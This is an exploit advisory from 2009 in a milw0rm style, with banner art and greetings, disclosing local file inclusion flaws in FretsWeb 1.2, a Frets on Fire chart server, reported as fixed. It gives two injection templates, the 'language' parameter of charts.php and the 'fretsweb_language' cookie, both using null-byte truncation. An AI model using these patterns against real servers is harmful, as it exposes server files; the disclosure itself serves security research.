***********************************************************************************************
***********************************************************************************************
**                                  **
**                             **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []   []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**                                                   **
**                               **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**          ¡PROUD TO BE SPANISH!             **
**                           **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|                  MULTIPLE LOCAL FILE INCLUSION VULNERABILITIES                |
|--------------------------------------------------------------------------------------------|
|                                    |      FretsWeb 1.2      |                       |
|  CMS INFORMATION:                  ------------------------                                |
|                                 |
|-->WEB: http://sourceforge.net/projects/fretsweb/                      |
|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/                                 |
|-->DEMO: N/A                         |
|-->CATEGORY: CMS / Games/Entertainment                   |
|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...              |
|    is an improved version of FoFCS.It is meant for...                   |
|-->RELEASED: 2009-05-30                     |
|                           |
|  CMS VULNERABILITY:                       |
|                           |
|-->TESTED ON: firefox 3                                 |
|-->DORK: N/A                               |
|-->CATEGORY: LOCAL FILE INCLUSION (LFI) / INSECURE COOKIE HANDLING (LFI)               |
|-->AFFECT VERSION: CURRENT (MAYBE <= ?)                  |
|-->Discovered Bug date: 2009-06-02                   |
|-->Reported Bug date: 2009-06-02                   |
|-->Fixed bug date: 2009-06-14                     |
|-->Info patch: http://sourceforge.net/projects/fretsweb/             |
|-->Author: YEnH4ckEr                       |
|-->mail: y3nh4ck3r[at]gmail[dot]com                   |
|-->WEB/BLOG: N/A                       |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)           |
----------------------------------------------------------------------------------------------



Note: Of course use null byte (%00) when you want to include a file with different extension to "php"



###########################
///////////////////////////

LOCAL FILE INCLUSION (LFI):

///////////////////////////
###########################



<<<<---------++++++++++++++ Condition: Nothing +++++++++++++++++--------->>>>



[++] GET var --> 'language'



~~> http://[HOST]/[PATH]/charts.php?language=[LFI]%00



###############################
///////////////////////////////

INSECURE COOKIE HANDLING (LFI):

///////////////////////////////
###############################



[++] Cookie --> 'fretsweb_language'



~~> fretsweb_language=[LFI]%00



<<<-----------------------------EOF---------------------------------->>>ENJOY IT!




##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################